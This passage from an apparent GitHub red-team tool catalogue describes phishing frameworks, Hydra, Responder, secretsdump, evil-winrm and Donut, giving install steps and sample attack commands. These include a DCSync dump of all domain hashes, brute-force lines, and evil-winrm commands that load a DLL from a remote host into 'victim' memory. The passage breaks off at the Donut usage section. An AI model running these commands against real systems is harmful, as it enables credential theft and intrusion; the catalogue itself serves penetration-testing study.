class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/fin3ss3g0d/evilgophish">EvilGoPhish</a></h3><a id="user-content-evilgophish" class="anchor" aria-label="Permalink: 🔙EvilGoPhish" href="#evilgophish"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">evilginx2 + 
gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/fin3ss3g0d/evilgophish"><pre>git clone https://github.com/fin3ss3g0d/evilgophish</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Usage: ./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool> - root domain - the root domain to be used for the campaign - subdomains - a space separated list of evilginx2 subdomains, can be one if only one - root domain bool - true or false to proxy root domain to evilginx2 - redirect url - URL to redirect unauthorized Apache requests - feed bool - true or false if you plan to use the live feed - rid replacement - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false"><pre class="notranslate"><code>Usage: ./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool> - root domain - the root domain to be used for the campaign - subdomains - a space separated list of evilginx2 subdomains, can be one if only one - root domain bool - true or false to proxy root domain to evilginx2 - redirect url - URL to redirect unauthorized Apache requests - feed bool - true or false if you plan to use the live feed - rid 
replacement - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png"><img src="https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/IO1337/social-engineering-toolkit">Social Engineer Toolkit (SET)</a></h3><a id="user-content-social-engineer-toolkit-set" class="anchor" aria-label="Permalink: 🔙Social Engineer Toolkit (SET)" href="#social-engineer-toolkit-set"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
data-snippet-clipboard-copy-content="git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install"><pre>git clone https://github.com/IO1337/social-engineering-toolkit<span class="pl-k">;</span> <span class="pl-c1">cd</span> <span class="pl-c1">set</span><span class="pl-k">;</span> python setup.py install</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 setoolkit"><pre>python3 setoolkit</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png"><img src="https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/vanhauser-thc/thc-hydra">Hydra</a></h3><a id="user-content-hydra" class="anchor" aria-label="Permalink: 🔙Hydra" href="#hydra"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for logon brute force attacks. 
Can brute-force logons to a number of services, including SSH, FTP, TELNET, HTTP, etc.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install hydra"><pre>sudo apt install hydra</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh"><pre>hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form <span class="pl-s"><span class="pl-pds">"</span>login.php:username-^USER^&password=^PASS^:Error<span class="pl-pds">"</span></span> hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png"><img src="https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/secureworks/squarephish">SquarePhish</a></h3><a id="user-content-squarephish" class="anchor" aria-label="Permalink: 🔙SquarePhish" href="#squarephish"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25
1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See <a href="https://github.com/secureworks/PhishInSuits">PhishInSuits</a> for more about OAuth Device Code flow for phishing attacks).</p> <p dir="auto">Attack Steps:</p> <ul dir="auto"> <li>Send malicious QR code to victim</li> <li>Victim scans QR code with mobile device</li> <li>Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)</li> <li>Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)</li> <li>Attacker polls for authentication</li> <li>Victim enters code into legit Microsoft website</li> <li>Attacker saves authentication token</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt"><pre>git clone https://github.com/secureworks/squarephish<span class="pl-k">;</span> <span class="pl-c1">cd</span> squarephish<span class="pl-k">;</span> pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Note:</strong> <em>Before using either module, update the required information in the settings.config file noted with <code>Required</code>.</em></p> <p dir="auto"><strong>Usage (Email Module):</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] 
--debug enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to"><pre class="notranslate"><code>usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to </code></pre></div> <p dir="auto"><strong>Usage (Server Module):</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging"><pre class="notranslate"><code>usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png"><img src="https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/securestate/king-phisher">King Phisher</a></h3><a id="user-content-king-phisher" class="anchor" aria-label="Permalink: 🔙King Phisher" href="#king-phisher"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 
0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.</p> <p dir="auto">It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, attackers can target individuals or organizations with convincing, targeted phishing emails, increasing the chances of success in their attacks.</p> <p dir="auto"><strong>Install (Linux - Client & Server):</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \ sudo bash ./install.sh"><pre>wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh <span class="pl-k">&&</span> \ sudo bash ./install.sh</pre></div> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Once King Phisher has been installed, please follow the <a href="https://github.com/rsmusllp/king-phisher/wiki/Getting-Started">wiki page</a> to set up SSH, the database config, the SMTP server, etc.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png"><img src="https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png" alt="image"
style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Execution</h1><a id="user-content-execution" class="anchor" aria-label="Permalink: Execution" href="#execution"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/SpiderLabs/Responder">Responder</a></h3><a id="user-content-responder" class="anchor" aria-label="Permalink: 🔙Responder" href="#responder"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary 
code execution.</p> <p dir="auto">The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. When a hostname cannot be resolved through DNS, the system falls back to these protocols and broadcasts/multicasts a request for the hostname to the local network, accepting an answer from any host that replies.</p> <p dir="auto">Responder listens for these requests and answers them with the attacker's IP address, so the requesting system connects to the attacker and authenticates to it. The captured material is typically an NTLMv1/NTLMv2 challenge-response, which can be cracked offline or relayed to other hosts.</p> <p dir="auto"><strong>Note:</strong> <em>By default Responder answers every name request it sees, which is noisy and is readily detected by LLMNR/NBT-NS honeypot names. The SpiderLabs repository linked above is the original; active development continues in the <a href="https://github.com/lgandx/Responder">lgandx/Responder</a> fork.</em></p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/SpiderLabs/Responder cd Responder"><pre>git clone https://github.com/SpiderLabs/Responder <span class="pl-c1">cd</span> Responder</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Running the tool ./Responder.py [options] # Typical usage ./Responder.py -I eth0 -wrf"><pre><span class="pl-c"><span class="pl-c">#</span> Running the tool</span> ./Responder.py [options] <span class="pl-c"><span class="pl-c">#</span> Typical usage</span> ./Responder.py -I eth0 -wrf</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/SpiderLabs/Responder#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png"><img src="https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/"
rel="nofollow">https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py">secretsdump</a></h3><a id="user-content-secretsdump" class="anchor" aria-label="Permalink: 🔙secretsdump" href="#secretsdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.</p> <p dir="auto">It does this either by reading the registry hives (SAM, SECURITY, SYSTEM) and the NTDS.dit database, remotely over SMB or from local copies of the files, or by asking a Domain Controller to replicate the data via DRSUAPI (the &quot;DCSync&quot; technique). From these sources it extracts the hashed passwords and other information, such as:</p> <ul dir="auto"> <li>Password hashes for local accounts (SAM) and domain accounts (NTDS.dit / DCSync)</li> <li>Kerberos keys for domain accounts</li> <li>LSA Secrets and cached domain logon hashes</li> </ul> <p dir="auto"><strong>Note:</strong> <em>The DCSync mode shown below requires an account holding directory replication rights (Domain Admins or equivalent). A password placed on the command line is visible in the process list and shell history; prefer <code>-hashes</code> or a Kerberos ticket (<code>-k -no-pass</code>) where possible.</em></p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 -m pip install impacket"><pre>python3 -m pip install impacket</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Extract NTLM
hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # DCSync attack and dump the NTLM hashes of all domain users. secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30"><pre><span class="pl-c"><span class="pl-c">#</span> Extract NTLM hashes with local files</span> secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL <span class="pl-c"><span class="pl-c">#</span> DCSync attack and dump the NTLM hashes of all domain users.</span> secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png"><img src="https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy" rel="nofollow">https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Hackplayers/evil-winrm">evil-winrm</a></h3><a id="user-content-evil-winrm" class="anchor" aria-label="Permalink: 🔙evil-winrm" href="#evil-winrm"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 
1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: <em>A service that allows administrators to remotely execute commands on a Windows machine</em>).</p> <p dir="auto">Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.</p> <p dir="auto">Some features include:</p> <ul dir="auto"> <li>Loading in memory Powershell scripts</li> <li>Loading in memory dll files bypassing some AVs</li> <li>Loading x64 payloads</li> <li>Pass-the-hash support</li> <li>Uploading and downloading local and remote files</li> </ul> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm"><pre>sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git <span class="pl-c1">cd</span> evil-winrm</pre></div> <p dir="auto"><strong>Install: (Ruby gem)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="gem install evil-winrm"><pre>gem install evil-winrm</pre></div> <p dir="auto">Alternative installation instructions can be found <a href="https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Connect to 192.168.1.100 as Administrator with custom exe/ps1 
download folder locations evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' # Upload local files to victim upload local_filename upload local_filename destination_filename # Download remote files to local machine download remote_filename download remote_filename destination_filename # Execute .Net assembly into victim memory Invoke-Binary /opt/csharp/Rubeus.exe # Load DLL library into victim memory Dll-Loader -http http://10.10.10.10/SharpSploit.dll"><pre><span class="pl-c"><span class="pl-c">#</span> Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations</span> evil-winrm -i 192.168.1.100 -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>MySuperSecr3tPass123!<span class="pl-pds">'</span></span> -s <span class="pl-s"><span class="pl-pds">'</span>/home/foo/ps1_scripts/<span class="pl-pds">'</span></span> -e <span class="pl-s"><span class="pl-pds">'</span>/home/foo/exe_files/<span class="pl-pds">'</span></span> <span class="pl-c"><span class="pl-c">#</span> Upload local files to victim</span> upload local_filename upload local_filename destination_filename <span class="pl-c"><span class="pl-c">#</span> Download remote files to local machine</span> download remote_filename download remote_filename destination_filename <span class="pl-c"><span class="pl-c">#</span> Execute .Net assembly into victim memory</span> Invoke-Binary /opt/csharp/Rubeus.exe <span class="pl-c"><span class="pl-c">#</span> Load DLL library into victim memory</span> Dll-Loader -http http://10.10.10.10/SharpSploit.dll</pre></div> <p dir="auto">Full usage documentation can be found <a href="https://github.com/Hackplayers/evil-winrm#documentation">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png"><img 
src="https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://korbinian-spielvogel.de/posts/heist-writeup/" rel="nofollow">https://korbinian-spielvogel.de/posts/heist-writeup/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/TheWover/donut/">Donut</a></h3><a id="user-content-donut" class="anchor" aria-label="Permalink: 🔙Donut" href="#donut"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Donut generates position-independent shellcode that loads and runs VBScript, JScript, EXE and DLL files and .NET assemblies from memory. Because the output is shellcode, it can be delivered by whatever loader or injector you already use, and the payload itself never has to be written to the target's disk.</p> <p dir="auto"><strong>Install: (Windows)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/thewover/donut.git"><pre>git clone https://github.com/thewover/donut.git</pre></div> <p dir="auto">To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe.
Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="nmake -f Makefile.msvc"><pre>nmake -f Makefile.msvc</pre></div> <p dir="auto">To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="make -f Makefile.mingw"><pre>make -f Makefile.mingw</pre></div> <p dir="auto"><strong>Install: (Linux)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip3 install donut-shellcode"><pre>pip3 install donut-shellcode</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div 